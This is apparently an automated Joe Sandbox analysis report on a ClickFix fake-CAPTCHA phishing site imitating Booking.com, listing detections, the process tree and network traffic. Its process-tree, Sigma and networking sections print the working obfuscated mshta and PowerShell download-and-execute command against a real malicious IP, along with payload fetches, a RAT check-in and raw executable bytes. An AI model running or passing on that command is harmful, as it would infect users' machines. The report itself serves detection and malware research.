Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
http://roombedsrewiews.com

Overview

General Information

Sample URL:http://roombedsrewiews.com
Analysis ID:1651034
Infos:

Detection

CAPTCHA Scam ClickFix
Score:100
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for dropped file
Detect drive by download via clipboard copy & paste
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
HTML page adds supicious text to clipboard
Injects a PE file into a foreign processes
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Downloads executable code via HTTP
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Suricata IDS alerts with low severity for network traffic

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 5580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 1400 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1972,i,6627453953828994574,1927372697243055533,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2032 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6968 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://roombedsrewiews.com" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • svchost.exe (PID: 6636 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • mshta.exe (PID: 8036 cmdline: "C:\Windows\system32\mshta.exe" https://adult-hub1990.cfd/rq3xYUErWsFPbHiX.html #'' I'm human ID505306'' MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 8132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 3724 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 5128 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES189A.tmp" "c:\Users\user\AppData\Local\Temp\CSC8B1832D39C30407296B9DAA42FAFADD.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • MSBuild.exe (PID: 7536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.1645128494.0000020F80402000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000010.00000002.1645128494.0000020F8049A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000014.00000002.2010937734.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000014.00000002.2022674073.0000000003151000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

          HTML

          SourceRuleDescriptionAuthorStrings
          0.0.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
            0.1.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
              0.2.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security

                Sigma Signatures

                System Summary

                barindex
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 92.255.85.2, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7536, Protocol: tcp, SourceIp: 192.168.2.17, SourceIsIpv6: false, SourcePort: 50042
                Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 208.95.112.1, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7536, Protocol: tcp, SourceIp: 192.168.2.17, SourceIsIpv6: false, SourcePort: 50043
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://adult-hub1990.cfd/rq3xYUErWsFPbHiX.html #'' I'm human ID505306'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8036, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX", ProcessId: 8132, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8132, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline", ProcessId: 3724, ProcessName: csc.exe
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8132, TargetFilename: C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://adult-hub1990.cfd/rq3xYUErWsFPbHiX.html #'' I'm human ID505306'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8036, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX", ProcessId: 8132, ProcessName: powershell.exe
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6636, ProcessName: svchost.exe

                Data Obfuscation

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8132, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline", ProcessId: 3724, ProcessName: csc.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-28T11:28:19.688227+010020185811A Network Trojan was detected192.168.2.175004192.255.85.280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-28T11:28:19.688227+010020197142Potentially Bad Traffic192.168.2.175004192.255.85.280TCP
                2025-03-28T11:28:20.924989+010020197142Potentially Bad Traffic192.168.2.175004192.255.85.280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-28T11:28:19.688227+010028033053Unknown Traffic192.168.2.175004192.255.85.280TCP
                2025-03-28T11:28:20.924989+010028033053Unknown Traffic192.168.2.175004192.255.85.280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-28T11:29:02.893297+010028032742Potentially Bad Traffic192.168.2.175005592.255.85.280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-28T11:28:19.497799+010028607041A Network Trojan was detected192.168.2.175004192.255.85.280TCP
                2025-03-28T11:29:02.656192+010028607041A Network Trojan was detected192.168.2.175005592.255.85.280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-28T11:29:02.893297+010018100002Potentially Bad Traffic192.168.2.175005592.255.85.280TCP

                Joe Sandbox Signatures

                • AV Detection
                • Phishing
                • Compliance
                • Spreading
                • Software Vulnerabilities
                • Networking
                • System Summary
                • Data Obfuscation
                • Persistence and Installation Behavior
                • Hooking and other Techniques for Hiding and Protection
                • Malware Analysis System Evasion
                • Anti Debugging
                • HIPS / PFW / Operating System Protection Evasion
                • Language, Device and Operating System Detection
                • Lowering of HIPS / PFW / Operating System Security Settings

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: C:\Users\user\AppData\Local\Temp\toaudqqy.dllAvira: detection malicious, Label: TR/Dropper.Gen7

                Phishing

                barindex
                Source: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIJoe Sandbox AI: Score: 9 Reasons: The brand 'Booking.com' is a well-known online travel agency., The legitimate domain for Booking.com is 'booking.com'., The provided URL 'booking.roombedsrewiews.com' does not match the legitimate domain., The URL contains additional words 'roombedsrewiews', which is suspicious and indicative of phishing., The structure of the URL suggests an attempt to mimic the legitimate brand by using a similar name. DOM: 0.0.pages.csv
                Source: Yara matchFile source: 0.0.pages.csv, type: HTML
                Source: Yara matchFile source: 0.1.pages.csv, type: HTML
                Source: Yara matchFile source: 0.2.pages.csv, type: HTML
                Source: unknownHTTPS traffic detected: 172.67.207.52:443 -> 192.168.2.17:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.61.69:443 -> 192.168.2.17:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.17:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.61.69:443 -> 192.168.2.17:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.96.110:443 -> 192.168.2.17:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.207.52:443 -> 192.168.2.17:49754 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.207.52:443 -> 192.168.2.17:49755 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.17:49758 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.204.6.193:443 -> 192.168.2.17:49771 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 134.213.193.62:443 -> 192.168.2.17:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.96.110:443 -> 192.168.2.17:49777 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.208.240:443 -> 192.168.2.17:49778 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.209.240:443 -> 192.168.2.17:49780 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.209.240:443 -> 192.168.2.17:49784 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.17:49787 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.17:50040 version: TLS 1.2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: chrome.exeMemory has grown: Private usage: 1MB later: 39MB

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2860704 - Severity 1 - ETPRO MALWARE Single Character .mp4 Download With Minimal Headers - Likely Hostile : 192.168.2.17:50041 -> 92.255.85.2:80
                Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.17:50041 -> 92.255.85.2:80
                Source: Network trafficSuricata IDS: 2058998 - Severity 1 - ET MALWARE Sheet RAT CnC Checkin : 192.168.2.17:50042 -> 92.255.85.2:7777
                Source: Network trafficSuricata IDS: 2860704 - Severity 1 - ETPRO MALWARE Single Character .mp4 Download With Minimal Headers - Likely Hostile : 192.168.2.17:50055 -> 92.255.85.2:80
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Thu, 27 Mar 2025 12:00:58 GMTAccept-Ranges: bytesETag: "9adde6f9fdb1:0"Server: Microsoft-IIS/10.0Date: Fri, 28 Mar 2025 10:28:19 GMTContent-Length: 458144Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 95 fc ac ec 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ae 06 00 00 32 00 00 00 00 00 00 8e cc 06 00 00 20 00 00 00 e0 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 07 00 00 02 00 00 0d 21 07 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 cc 06 00 57 00 00 00 00 e0 06 00 e8 2e 00 00 00 00 00 00 00 00 00 00 00 e2 06 00 a0 1b 00 00 00 20 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 ac 06 00 00 20 00 00 00 ae 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 2e 00 00 00 e0 06 00 00 30 00 00 00 b0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 07 00 00 02 00 00 00 e0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 cc 06 00 00 00 00 00 48 00 00 00 02 00 05 00 40 5d 01 00 f4 6e 05 00 03 00 02 00 04 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1e 00 28 05 01 00 06 2a 1e 00 28 06 01 00 06 2a 1e 00 28 07 01 00 06 2a 1e 00 28 08 01 00 06 2a 1e 00 28 09 01 00 06 2a 1e 00 28 0a 01 00 06 2a 1e 00 28 0b 01 00 06 2a 1e 00 28 0c 01 00 06 2a 1e 00 28 0d 01 00 06 2a 1e 00 28 0e 01 00 06 2a 1e 00 28 0f 01 00 06 2a 1e 00 28 10 01 00 06 2a 1e 00 28 11 01 00 06 2a 1e 00 28 12 01 00 06 2a 1e 00 28 13 01 00 06 2a 1e 00 28 14 01 00 06 2a 1e 00 28 15 01 00 06 2a 1e 00 28 16 01 00 06 2a 1e 00 28 17 01 00 06 2a 1e 00 28 18 01 00 06 2a 1e 00 28 19 01 00 06 2a 1e 00 28 1a 01 00 06 2a 1e 00 28 1b 01 00 06 2a 1e 00 28 1c 01 00 06 2a 1e 00 28 1d 01 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"02 @ @!`4W. H
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Thu, 27 Mar 2025 21:51:51 GMTAccept-Ranges: bytesETag: "fa7c8872629fdb1:0"Server: Microsoft-IIS/10.0Date: Fri, 28 Mar 2025 10:28:20 GMTContent-Length: 54272Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6b 9a e2 8d 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 ca 00 00 00 08 00 00 00 00 00 00 0e e9 00 00 00 20 00 00 00 00 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 e8 00 00 57 00 00 00 00 00 01 00 da 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 c9 00 00 00 20 00 00 00 ca 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 da 05 00 00 00 00 01 00 00 06 00 00 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 01 00 00 02 00 00 00 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 e8 00 00 00 00 00 00 48 00 00 00 02 00 05 00 2c a7 00 00 88 41 00 00 01 00 00 00 04 00 00 06 4c 3a 00 00 dd 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 17 28 7d 00 00 06 2a 1e 02 28 15 00 00 0a 2a 92 72 01 00 00 70 80 01 00 00 04 72 17 00 00 70 80 02 00 00 04 72 2f 00 00 70 28 16 00 00 0a 80 03 00 00 04 2a 2e 73 07 00 00 06 80 04 00 00 04 2a 1a 28 1a 00 00 06 2a f2 73 22 00 00 0a 25 72 39 00 00 70 72 eb 00 00 70 6f 23 00 00 0a 25 72 71 00 00 70 28 10 00 00 06 6f 23 00 00 0a 25 72 fd 00 00 70 02 6f 23 00 00 0a 6f 2d 00 00 0a 28 1c 00 00 06 2a f2 73 22 00 00 0a 25 72 39 00 00 70 72 0d 01 00 70 6f 23 00 00 0a 25 72 71 00 00 70 28 10 00 00 06 6f 23 00 00 0a 25 72 fd 00 00 70 02 6f 23 00 00 0a 6f 2d 00 00 0a 28 1c 00 00 06 2a 1a 7e 06 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELk"0 @ @`W H
                Source: global trafficHTTP traffic detected: GET /a.mp4 HTTP/1.1Host: 92.255.85.2Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /j.exe HTTP/1.1Host: 92.255.85.2
                Source: global trafficHTTP traffic detected: GET /qx.exe HTTP/1.1Host: 92.255.85.2
                Source: global trafficHTTP traffic detected: GET /line HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /b.mp4 HTTP/1.1Host: 92.255.85.2Connection: Keep-Alive
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.17:50041 -> 92.255.85.2:80
                Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.17:50041 -> 92.255.85.2:80
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.17:50055 -> 92.255.85.2:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.17:50055 -> 92.255.85.2:80
                Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
                Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
                Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
                Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
                Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
                Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
                Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
                Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
                Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
